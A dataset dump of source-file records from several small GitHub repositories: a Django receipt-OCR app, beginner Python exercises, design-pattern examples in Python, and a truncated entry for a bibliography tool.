"blob_id": "d365f9e56ff026942882a08d669dd394db3e6d17",
"content_id": "eef2221b02c86351e31a4831e3c384055342cbdd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 159,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 8,
"path": "/receipt/forms.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom .models import Paragon\n\n\nclass ParagonForm(forms.ModelForm):\n class Meta:\n model = Paragon\n fields =('image',)\n\n"
},
{
"alpha_fraction": 0.4889867901802063,
"alphanum_fraction": 0.691629946231842,
"avg_line_length": 16.461538314819336,
"blob_id": "4dbb2afa4e8959f6c06c97a901e0cbe60e35bf9a",
"content_id": "4acd41a1ea59ee23515d042d7ac8dad4222e4f13",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 227,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 13,
"path": "/requirements.txt",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "amqp==2.1.4\nbilliard==3.5.0.2\ncelery==4.0.2\nDjango==1.10.5\ndjango-celery-beat==1.0.1\ndjango-celery-results==1.0.1\nkombu==4.0.2\nPillow==3.4.2\npytesseract==0.1.6\npython-Levenshtein==0.12.0\npytz==2016.10\nredis==2.10.5\nvine==1.1.3\n"
},
{
"alpha_fraction": 0.7027971744537354,
"alphanum_fraction": 0.7080419659614563,
"avg_line_length": 30.61111068725586,
"blob_id": "bb17fda0a82a0e6a4a884dcf40d07543036c60f0",
"content_id": "e3b2f6fb7255feeee73002cb7a5a65aa9468092d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 18,
"path": "/receipt/tasks.py",
"repo_name": "stodola/mlshopping",
"src_encoding": "UTF-8",
"text": "#from __future__ import absolute_import, unicode_literals\nfrom celery.decorators import task\n\nfrom .models import Paragon, ParagonItems\nimport pytesseract\nfrom PIL import Image, ImageFilter\nfrom .image_utils import to_text\n\n@task(name='tessaract_in_action')\ndef items_from_image(image):\n hj=Paragon.objects.get(image=image)\n dane = pytesseract.image_to_string(Image.open(hj.image.path), lang='pol')\n dane2 = to_text(dane)\n for i,j in dane2:\n p=ParagonItems(id_paragonu=hj, cena =j, produkt=i)\n p.save()\n hj.image_data = dane2\n hj.save()\n\n\n\n"
}
] | 11 |
sanket7783/BigDataPractice
|
https://github.com/sanket7783/BigDataPractice
|
08a86147c78c7c98ce8ed7156d01f596cf7db033
|
4023d3327f3d1fbdffbe24476423b82d5254b7ef
|
38fabf018cd2530f3409cf86ddae7c3e3e92f8fe
|
refs/heads/master
| 2020-11-28T11:46:57.527347 | 2019-12-28T19:55:58 | 2019-12-28T19:55:58 | 229,803,637 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.614386796951294,
"alphanum_fraction": 0.6214622855186462,
"avg_line_length": 24.606060028076172,
"blob_id": "21ffca817ab4f99632f71268fe9fb5a9831aefb7",
"content_id": "db1cc77709e7c22bb0ff647a69c82705ab678712",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 848,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 33,
"path": "/avro/avro-data-gen.py",
"repo_name": "sanket7783/BigDataPractice",
"src_encoding": "UTF-8",
"text": "from fastavro import reader, writer, parse_schema\nimport json\n\ninpFile = str(input(\"Enter the avro data file name: \"))\ninpSchemaFile = str(input(\"Enter the avro schema file name: \"))\noutFile = str(input(\"Enter the avro output file: \")) or \"outdata.avro\"\n\n\nwith open(inpSchemaFile,'rb') as sc:\n schema = sc.read()\n\nparsed = parse_schema(json.loads(schema))\n\n\nwith open(inpFile,'rb') as inp:\n records = [r for r in reader(inp)]\n records.append(records[-1])\n flag=1\n while flag:\n field = str(input(\"Which field you want to edit: \"))\n if '.' in field:\n pass\n else:\n records[-1][field] = int(input(\"Enter the value for \"+ field+\": \"))\n flag = int(input(\"Press 1 to continue or 0 to halt: \"))\n print(records[-1])\n\n\n\n\n\nwith open(outFile, 'wb') as out:\n writer(out, parsed, records)\n\n\n\n"
},
{
"alpha_fraction": 0.8372092843055725,
"alphanum_fraction": 0.8372092843055725,
"avg_line_length": 42,
"blob_id": "a5ced4766e6b91fa8aac107f37d62c91882ac4d9",
"content_id": "8e5a6e006244bbe511838a183ea233852cc6c73e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 86,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 2,
"path": "/README.md",
"repo_name": "sanket7783/BigDataPractice",
"src_encoding": "UTF-8",
"text": "# BigDataPractice\nContains the snippets that I have created while practicing Big data\n"
}
] | 2 |
chaithra-s/321810304038-Assignment-4
|
https://github.com/chaithra-s/321810304038-Assignment-4
|
605ecb5486d0dc725ef39f822ac394d5adb19bfb
|
16d0a6f283bafe4013ed6425c551bfd3ba05b14c
|
26639efe1fb46008760a3db3732110f6b52f2790
|
refs/heads/master
| 2022-11-07T22:53:27.080587 | 2020-06-23T01:57:34 | 2020-06-23T01:57:34 | 274,284,382 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6034836173057556,
"alphanum_fraction": 0.6229507923126221,
"avg_line_length": 19.14583396911621,
"blob_id": "b3c6763ebebef031484bf7a10890a2fa77ed9f91",
"content_id": "ce447dfdcd40120dae49a0c0618febe85c39f056",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 976,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 48,
"path": "/newfile.py",
"repo_name": "chaithra-s/321810304038-Assignment-4",
"src_encoding": "UTF-8",
"text": "#maximum of 3 numbers\ndef max(x,y,z):\n\tif x>y and x>z:\n\t\tprint(\"maximum is :\",x)\n\telif y>x and y>z:\n\t\tprint(\"maximum is :\",y)\n\telse:\n\t\tprint(\"maximum is :\",z)\nmax(2,7,6)\n\n#to reverse a string\nx=str(input(\"Enter a string:\"))\nprint(\"Reverse of the string is:\")\nprint(x[::-1])\n\n# prime or not\nnum=int(input(\"enter a number:\"))\nfor i in range(2,num):\n\tif num %i ==0:\n\t\tprint(num,\"is not a prime number\")\n\t\tbreak\n\telse:\n\t\tprint(num,\"is a prime number\")\n\t\t\n#palindrome or not\ntry:\n\tnum=int(input(\"Enter a number:\"))\n\texcept Exception as ValueError:\n\t\tprint('Invalid input enter a integer')\t\n\t\telse:\n\t\t\ttemp=num\n\t\t\trev=0\n\t\t\twhile(num>0):\n\t\t\t\tdig=num%10\n\t\t\t\trev=rev*10+dig\n\t\t\t\tnum=num//10\n\t\t\t\tif(temp==rev):\n\t\t\t\t\tprint(' The number is palindrome')\n\t\t\telse:\t\n\t\t\tprint('Not a palindrome')\n\t\t\tfinally:\n\t\t\t\tprint('program executed')\n\t\t\t\t\n#sum of squares of n natural numbers\ndef squaresum(n):\n\t\t\t\treturn(n*(n+1)*(2*n+1))//6\nn= int(input('Enter the number:'))\nprint(squaresum(n))\n\t\t\t\t\n\t\t\t\t"
}
] | 1 |
gamolyavlad/python_paterns
|
https://github.com/gamolyavlad/python_paterns
|
97f51fc2bcee11ff28e05547b97a24c060530d8c
|
8a5c5482e836856fe214b8b13995dbbd03e6c9e6
|
d5aa7c86c61af7490068685619c02dc403f1d62e
|
refs/heads/master
| 2020-04-03T09:53:33.998403 | 2016-10-10T22:14:12 | 2016-10-10T22:14:12 | 65,307,456 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6851471662521362,
"alphanum_fraction": 0.6940451860427856,
"avg_line_length": 30.085105895996094,
"blob_id": "30359111c2a15b295182c5b61229b9c7334e34f0",
"content_id": "1dd9a0765b831015352348ac77bb9c19b1ca02f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1461,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 47,
"path": "/creational/builder.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\" Python supports named parameters, so builder doesn`t make any sence . \"\"\"\n\nfrom collections import namedtuple\n\nIMMUTABLE_OBJECT_FIELDS = ['required_function_result', 'required_parameter', 'default_parameter']\n\n\nclass ImmutableObjectBuilder(object):\n def __init__(self, required_function, required_parameter, default_parameter=\"foo\"):\n self.required_function = required_function\n self.required_parameter = required_parameter\n self.default_parameter = default_parameter\n\n def build(self):\n return ImmutableObject(self.required_function(self.required_parameter),\n self.required_parameter,\n self.default_parameter)\n\n\nclass ImmutableObject(namedtuple('ImmutableObject', IMMUTABLE_OBJECT_FIELDS)):\n __slots__ = ()\n\n @property\n def foo_property(self):\n return self.required_function_result + self.required_parameter\n\n def foo_function(self):\n return self.required_function_result - self.required_parameter\n\n def __str__(self):\n return str(self.__dict__)\n\n\nmy_builder = ImmutableObjectBuilder(lambda x: x + 1, 2)\nobj1 = my_builder.build()\nmy_builder.default_parameter = \"bar\"\nmy_builder.required_parameter = 1\nobj2 = my_builder.build()\nmy_builder.required_function = lambda x: x - 1\nobj3 = my_builder.build()\n\nprint(obj1)\nprint(obj1.required_function_result)\nprint(obj1.foo_property)\nprint(obj1.foo_function())\nprint(obj2)\nprint(obj3)\n"
},
{
"alpha_fraction": 0.6522411108016968,
"alphanum_fraction": 0.6630603075027466,
"avg_line_length": 28.409090042114258,
"blob_id": "02046c02e80af62199d914767427f8150ddc9228",
"content_id": "b51b88b872ff78648e937c7b7d7413f796314b20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1294,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 44,
"path": "/structural/proxy.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nA proxy is a wrapper or agent object that is being called by the client to access\nthe real serving object behind the scenes.\nFor the client, usage of a proxy object is similar to using the real object, because both implement the same interface.\n\"\"\"\n\n\nclass Image(object):\n def __init__(self, filename):\n self._filename = filename\n self._loaded = False\n\n def load(self):\n print(\"loading {}\".format(self._filename))\n self._loaded = True\n\n def display(self):\n if not self._loaded:\n self.load()\n print(\"displaying {}\".format(self._filename))\n\n\nclass Proxy:\n def __init__(self, subject):\n self._subject = subject\n self._proxystate = None\n\n\nclass ProxyImage(Proxy):\n def display_image(self):\n if self._proxystate == None:\n self._subject.load()\n self._proxystate = 1\n print(\"display \" + self._subject._filename)\n\n\nproxy_image1 = ProxyImage(Image(\"HiRes_10Mb_Photo1\"))\nproxy_image2 = ProxyImage(Image(\"HiRes_10Mb_Photo2\"))\n\nproxy_image1.display_image() # loading necessary\nproxy_image1.display_image() # loading unnecessary\nproxy_image2.display_image() # loading necessary\nproxy_image2.display_image() # loading unnecessary\nproxy_image1.display_image() # loading unnecessary\n"
},
{
"alpha_fraction": 0.6662613749504089,
"alphanum_fraction": 0.6711246371269226,
"avg_line_length": 29.462963104248047,
"blob_id": "8c32522c6de68d48d33f33f07968ef6bd294d1f6",
"content_id": "adb54bdca16ed04f845a76a09d97065654929159",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1645,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 54,
"path": "/creational/abstract_factory.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThe abstract factory pattern provides a way to encapsulate a group of individual factories that have a common theme\nwithout specifying their concrete classes.[1] In normal usage, the client software creates a concrete implementation of\nthe abstract factory and then uses the generic interface of the factory to create the concrete objects that are part of\nthe theme\n\"\"\"\n\n\nclass Product(object):\n def __init__(self, name='iPhone', price=600.0, expiration_date=None, out_of_stock=False):\n self.name = name\n self.price = price\n self.expiration_date = expiration_date\n self.out_of_stock = out_of_stock\n\n def is_product_availiable(self):\n pass\n\n\nclass Shop(object):\n def get_availiable_product(self, name):\n pass\n\n\nclass Order(object):\n def __init__(self, ProductClass, ShopClass):\n self.product = ProductClass()\n self.shop = ShopClass()\n\n def get_order(self):\n return self.shop.get_availiable_product(self.product)\n\n\nclass Phone(Product):\n def is_product_availiable(self):\n if not self.out_of_stock:\n return True\n return False\n\n\nclass InternetShop(Shop):\n def __init__(self, *args, **kwargs):\n self.availiable_product = []\n iphone = Product('iPhone', 900)\n self.availiable_product.append(iphone.name)\n\n def get_availiable_product(self, product):\n if product.name in self.availiable_product and product.is_product_availiable():\n return product\n raise Exception('Product doesn`t availiable ')\n\nif __name__ == '__main__':\n order = Order(Phone, InternetShop)\n print(order.get_order())\n"
},
{
"alpha_fraction": 0.6213235259056091,
"alphanum_fraction": 0.6341911554336548,
"avg_line_length": 18.087718963623047,
"blob_id": "85678c9e59f12f7127ce21e86fa458b50cd8950a",
"content_id": "394ebeae3582fa0dc9de085824416b3d12ad7bca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1088,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 57,
"path": "/structural/adapter.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nConvert the interface of a class into another interface clients expect. Adapter lets classes work together that couldn't\notherwise because of incompatible interfaces.\n\"\"\"\n\n\nclass Png(object):\n def draw_png_image(self):\n return \"Draw png image\"\n\n\nclass Jpg(object):\n def draw_jpg_image(self):\n return \"Draw jpg image\"\n\n\nclass Photo(Png):\n def draw_image(self):\n return self.draw_png_image()\n\n\nclass Gradient(Jpg):\n def draw_image(self):\n return self.draw_jpg_image()\n\n\nclass Gallery:\n def __init__(self, source):\n self.source = source\n\n def show_picture(self):\n return self.source.draw_image()\n\n\np = Photo()\ng = Gradient()\nphoto_images = Gallery(p)\ngradient_background = Gallery(g)\nprint(photo_images.show_picture())\nprint(gradient_background.show_picture())\n\n\n# class Target:\n# @staticmethod\n# def meth1(p1, p2):\n#\n# print(p1 + \", \" + p2)\n#\n#\n# class Adapter:\n# @staticmethod\n# def meth2(p1, p2, p3):\n#\n# Target.meth1(p1, p2 + \" and \" + p3)\n#\n#\n# Adapter.meth2('here', 'there', 'everywhere')\n"
},
{
"alpha_fraction": 0.64665287733078,
"alphanum_fraction": 0.6659765243530273,
"avg_line_length": 26.339622497558594,
"blob_id": "908931c4d1c32a6dc883543c800dcf1b19178ee6",
"content_id": "0e625abb4400073f53e509b585c7c87b805ac25c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1459,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 53,
"path": "/structural/facade.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSubsystem1 general principle that I apply when I’m casting about trying to mold requirements into Subsystem1 first-cut object is\n“If something is ugly, hide it inside an object.” This is basically what Facade accomplishes. If you have Subsystem1 rather\nconfusing collection of classes and interactions that the client programmer doesn’t really need to see, then you can\ncreate an interface that is useful for the client programmer and that only presents what’s necessary.e.\n\"\"\"\n\n\nclass Subsystem1:\n def __init__(self, x):\n self.x = x\n print('init Subsystem1')\n\n\nclass Subsystem2:\n def __init__(self, x):\n self.x = x\n print('init Subsystem2')\n\n\nclass Subsystem3:\n def __init__(self, x):\n self.x = x\n print('init Subsystem3')\n\nclass Facade:\n @staticmethod\n def make_subsystem_1(x):\n print('make Subsystem1')\n return Subsystem1(x)\n\n @staticmethod\n def make_subsystem_2(x):\n print('make Subsystem2')\n return Subsystem2(x)\n\n @staticmethod\n def make_subsystem_3(x):\n print('make Subsystem3')\n return Subsystem3(x)\n\n\nclass Client:\n def __init__(self):\n self.facade = Facade()\n\n\n# gets the objects by calling the static methods\nif __name__ == '__main__':\n client = Client()\n Subsystem1 = client.facade.make_subsystem_1(1)\n Subsystem2 = client.facade.make_subsystem_2(1)\n Subsystem3 = client.facade.make_subsystem_3(1.0)\n"
},
{
"alpha_fraction": 0.5066320896148682,
"alphanum_fraction": 0.516435980796814,
"avg_line_length": 23.77142906188965,
"blob_id": "1b9765f310573f1c57129e35565b8994f6cc3974",
"content_id": "3b2e7062b81d7c07253c40f07e987dd8ce338969",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3468,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 140,
"path": "/behavioral/memento.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThe memento pattern is a software design pattern that provides the ability to restore an object to its previous state\n(undo via rollback)\n\"\"\"\n\n\nclass MementoMetaclass(type):\n cache = {}\n\n def __call__(self, *args):\n print(\"=\" * 20)\n print(\"ClassObj:\", self)\n print(\"Args:\", args)\n print(\"=\" * 20)\n cached = self.cache.get(args, None)\n if not cached:\n instance = type.__call__(self, *args)\n self.cache.update({args: instance})\n return instance\n return cached\n\n\nclass Foo(object):\n __metaclass__ = MementoMetaclass\n template = ''\n\n def __init__(self, arg1, arg2, arg3):\n self.template = arg1\n\n\nif __name__ == '__main__':\n a = Foo(1, 2, 3)\n b = Foo(2, 3, 4)\n c = Foo(1, 2, 3)\n d = Foo(2, 3, 4)\n e = Foo(5, 6, 7)\n f = Foo(5, 6, 7)\n\n print(id(a), id(b), id(c), id(d), id(e), id(f))\n# from copy import copy, deepcopy\n#\n#\n# def memento(obj, deep=False):\n# state = deepcopy(obj.__dict__) if deep else copy(obj.__dict__)\n#\n# def restore():\n# obj.__dict__.clear()\n# obj.__dict__.update(state)\n#\n# return restore\n#\n#\n# class Transaction:\n# \"\"\"A transaction guard.\n# This is, in fact, just syntactic sugar around a memento closure.\n# \"\"\"\n# deep = False\n# states = []\n#\n# def __init__(self, deep, *targets):\n# self.deep = deep\n# self.targets = targets\n# self.commit()\n#\n# def commit(self):\n# self.states = [memento(target, self.deep) for target in self.targets]\n#\n# def rollback(self):\n# for a_state in self.states:\n# a_state()\n#\n#\n# class Transactional(object):\n# \"\"\"Adds transactional semantics to methods. Methods decorated with\n# @Transactional will rollback to entry-state upon exceptions.\n# \"\"\"\n#\n# def __init__(self, method):\n# self.method = method\n#\n# def __get__(self, obj, T):\n# def transaction(*args, **kwargs):\n# state = memento(obj)\n# try:\n# return self.method(obj, *args, **kwargs)\n# except Exception as e:\n# state()\n# raise e\n#\n# return transaction\n#\n#\n# class NumObj(object):\n# def __init__(self, value):\n# self.value = value\n#\n# def __repr__(self):\n# return '<%s: %r>' % (self.__class__.__name__, self.value)\n#\n# def increment(self):\n# self.value += 1\n#\n# @Transactional\n# def do_stuff(self):\n# self.value = '1111' # <- invalid value\n# self.increment() # <- will fail and rollback\n#\n#\n# if __name__ == '__main__':\n# num_obj = NumObj(-1)\n# print(num_obj)\n#\n# a_transaction = Transaction(True, num_obj)\n# try:\n# for i in range(3):\n# num_obj.increment()\n# print(num_obj)\n# a_transaction.commit()\n# print('-- committed')\n#\n# for i in range(3):\n# num_obj.increment()\n# print(num_obj)\n# num_obj.value += 'x' # will fail\n# print(num_obj)\n# except Exception as e:\n# a_transaction.rollback()\n# print('-- rolled back')\n# print(num_obj)\n#\n# print('-- now doing stuff ...')\n# try:\n# num_obj.do_stuff()\n# except Exception as e:\n# print('-> doing stuff failed!')\n# import sys\n# import traceback\n#\n# traceback.print_exc(file=sys.stdout)\n# print(num_obj)\n"
},
{
"alpha_fraction": 0.6603773832321167,
"alphanum_fraction": 0.6603773832321167,
"avg_line_length": 15.736842155456543,
"blob_id": "9437d3ac2db6908fb305871c395042b3bb318ae2",
"content_id": "e8bda572ced9934dd36ca63b1c908efa0f86e710",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 19,
"path": "/structural/decorator.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAlready implemented in python\n\"\"\"\n\n\ndef main_function(text):\n return \"Passed into main function : {}\".format(text)\n\n\ndef decorate(func):\n def func_wrapper(name):\n return \"Before : {}\".format(func(name))\n\n return func_wrapper\n\n\nmy_get_text = decorate(main_function)\n\nprint(my_get_text(\"Main text\"))\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6040816307067871,
"avg_line_length": 18.090909957885742,
"blob_id": "a256804e008576910091064dcef08e283b437a05",
"content_id": "2de881725619daf11c821f58428357749aabd8d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1470,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 77,
"path": "/creational/factory_method.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDefine an interface for creating an object , but let subclasses decide which class to instantiate.\nFactory Method lets a class defer instantiation to subclasses\n\"\"\"\n\n\nclass Genre(object):\n @staticmethod\n def factory(type):\n if type == \"Adventure\":\n return Adventure()\n elif type == \"Drama\":\n return Drama()\n raise Exception('invalid type {}'.format(type))\n\n\nclass Adventure(Genre):\n def drive(self):\n print(\"Adventure class\")\n\n\nclass Drama(Genre):\n def drive(self):\n print(\"Drana class.\")\n\n\"\"\"Example from book\"\"\"\n\n\nclass Culture:\n def __repr__(self):\n return self.__str__()\n\n\nclass Democracy(Culture):\n def __str__(self):\n return 'Democracy'\n\n\nclass Dictatorship(Culture):\n def __str__(self):\n return 'Dictatorship'\n\n\nclass Government:\n culture = ''\n\n def __str__(self):\n return self.culture.__str__()\n\n def __repr__(self):\n return self.culture.__repr__()\n\n def set_culture(self):\n raise AttributeError('Not Implemented Culture')\n\n\nclass GovernmentA(Government):\n def set_culture(self):\n self.culture = Democracy()\n\n\nclass GovernmentB(Government):\n def set_culture(self):\n self.culture = Dictatorship()\n\n\nif __name__ == \"__main__\":\n obj = Genre.factory(\"Adventure\")\n obj.drive()\n\n g1 = GovernmentA()\n g1.set_culture()\n print(str(g1))\n\n g2 = GovernmentB()\n g2.set_culture()\n print(str(g2))\n"
},
{
"alpha_fraction": 0.6414342522621155,
"alphanum_fraction": 0.6503984332084656,
"avg_line_length": 36.185184478759766,
"blob_id": "21933e5c431b6d24583333fa168b6276fec47f40",
"content_id": "f559befdf925f918567daed01d63e78d35030314",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1004,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 27,
"path": "/structural/flyweight.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\n A flyweight is an object that minimizes memory use by sharing as much data as possible with other similar objects;\n it is a way to use objects in large numbers when a simple repeated representation would use an unacceptable amount of\n memory. Often some parts of the object state can be shared, and it is common practice to hold them in external data\n structures and pass them to the flyweight objects temporarily when they are used.\n\n Python has weakref module to create weak references to objects.\n\"\"\"\n\n\nclass Human(object):\n __slots__ = ['gender', 'age', 'first_name']\n\n def __init__(self, gender, age, first_name):\n self.gender = gender\n self.age = age\n self.first_name = first_name\n\n def info(self, id):\n return self.gender, self.age, self.first_name, id\n\n\nif __name__ == '__main__':\n assembly = [(1, Human('male', '12', 'John')),\n (2, Human('female', '32', 'Helen')),\n (3, Human('male', '43', 'Dave'))]\n print(assembly)\n"
},
{
"alpha_fraction": 0.6365145444869995,
"alphanum_fraction": 0.6365145444869995,
"avg_line_length": 23.59183692932129,
"blob_id": "3bd24f4fbedc01aab82e68624bfb1ecfaa7efd4a",
"content_id": "1688313922f0b9a140805d30990cf0c8826083c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1205,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 49,
"path": "/structural/composite.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\"\"\"\nCompose objects into tree structures to represent part-whole hierarchies. Composite lets clients treat individual\nobjects and compositions of objects uniformly.\n\"\"\"\n\n\nclass Component(object):\n def __init__(self, *args, **kw):\n pass\n\n def component_function(self):\n raise NotImplemented\n\n\nclass Leaf(Component):\n def __init__(self, *args, **kw):\n Component.__init__(self, *args, **kw)\n\n def component_function(self):\n print(\"component_function {}\".format(self))\n\n\nclass Composite(Component):\n def __init__(self, *args, **kw):\n Component.__init__(self, *args, **kw)\n self.children = []\n\n def append_child(self, child):\n self.children.append(child)\n\n def remove_child(self, child):\n self.children.remove(child)\n\n def component_function(self):\n [x.component_function() for x in self.children]\n\n\nif __name__ == \"__main__\":\n composite = Composite()\n l = Leaf()\n l_two = Leaf()\n l_three = Leaf()\n composite.append_child(l)\n print(composite.children)\n composite.append_child(l_two)\n composite.append_child(l_three)\n print(composite.children)\n composite.component_function()\n"
},
{
"alpha_fraction": 0.6873508095741272,
"alphanum_fraction": 0.6933174133300781,
"avg_line_length": 33.91666793823242,
"blob_id": "7b8c13508b4019aa0af52f059405284aa2276fa0",
"content_id": "afaee078938aa74f3544b1f0a89928d1832d0df4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 838,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 24,
"path": "/structural/bridge.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThe bridge pattern is a design pattern used in software engineering which is meant to \"decouple an abstraction from its\nimplementation so that the two can vary independently\". The bridge uses encapsulation, aggregation, and can use\ninheritance to separate responsibilities into different classes.\n\"\"\"\nimport os\n\n\nclass FilePath(object):\n def create_file_path_1(self, dir_path, file_name):\n return os.path.join(dir_path, file_name)\n\n\nclass Bridge(object):\n def __init__(self):\n self.implem = FilePath()\n\n def create_file_path_2(self, dir_path, file_name, extenstion):\n return self.implem.create_file_path_1(dir_path, file_name + \".\" + extenstion)\n\n\nif __name__ == '__main__':\n print(FilePath().create_file_path_1('/tmp/', 'filename'))\n print(Bridge().create_file_path_2('/tmp/', 'filename', 'jpg'))\n"
},
{
"alpha_fraction": 0.5876288414001465,
"alphanum_fraction": 0.5876288414001465,
"avg_line_length": 21.823530197143555,
"blob_id": "6b11d546ac5c9f81cd67f69abc65ca5c83996955",
"content_id": "d779bbe1872c5addcb4b428936ecbeb3ea697766",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 776,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 34,
"path": "/creational/prototype.py",
"repo_name": "gamolyavlad/python_paterns",
"src_encoding": "UTF-8",
"text": "from copy import deepcopy\n\n\nclass Product(object):\n def __init__(self, name):\n self.name = name\n\n def get_name(self):\n return self.name\n\n\nclass Shop(object):\n \"\"\"Prototype class.\"\"\"\n def __init__(self):\n self._product = {}\n\n def register_product(self, product_name, product_obj):\n self._product[product_name] = product_obj\n\n def unregister_product(self, name):\n del self._product[name]\n\n def clone(self, name, **attr):\n obj = deepcopy(self._product[name])\n obj.__dict__.update(attr)\n return obj\n\nif __name__ == \"__main__\":\n BestBye = Shop()\n phone = Product('phone')\n BestBye.register_object('phone', phone)\n print(BestBye._product)\n TV = BestBye.clone('LG', name='TV')\n print(TV)\n"
}
] | 12 |
mohammedindore53/testrepo
|
https://github.com/mohammedindore53/testrepo
|
b5cccd0e5615b31f79bf90e98f819e59f0e6e40d
|
565cec6aee30acaab66f3936dc7551eaebda819a
|
b132d11d1fb79686897e89b95e113dca8ae00b92
|
refs/heads/main
| 2023-04-01T01:27:53.730492 | 2021-03-30T21:32:45 | 2021-03-30T21:32:45 | 346,839,965 | 0 | 0 | null | 2021-03-11T21:14:56 | 2021-03-11T21:19:30 | 2021-03-11T23:03:44 |
Python
|
[
{
"alpha_fraction": 0.7580645084381104,
"alphanum_fraction": 0.7580645084381104,
"avg_line_length": 30,
"blob_id": "dbfcb2821869c509b78c745e02829af50b227776",
"content_id": "f2ede6bc26c498d5bda663f8d553dd3e67e331c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 62,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 2,
"path": "/child.py",
"repo_name": "mohammedindore53/testrepo",
"src_encoding": "UTF-8",
"text": "# Creating a file in child branch\nprint(\"Inside child brach\")\n"
}
] | 1 |
fabrice102/bibboost
|
https://github.com/fabrice102/bibboost
|
be05477c93052a1f3d754c6577cdc5bffcbb20b7
|
8e29337918ddb3f6faf2c85e835a37ae16654ab6
|
1c39ca3e448b6afded4adc5cf77edd80329c54b7
|
refs/heads/master
| 2020-04-01T22:05:47.738120 | 2018-10-19T00:40:12 | 2018-10-19T00:40:12 | 153,691,482 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6512283682823181,
"alphanum_fraction": 0.6528393030166626,
"avg_line_length": 30.43037986755371,
"blob_id": "df347bcd7d8048c25102d933c33c28a261771aee",
"content_id": "94bf8bde52d33f6f1adca027d041b55d20129597",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2483,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 79,
"path": "/bibboost/__main__.py",
"repo_name": "fabrice102/bibboost",
"src_encoding": "UTF-8",
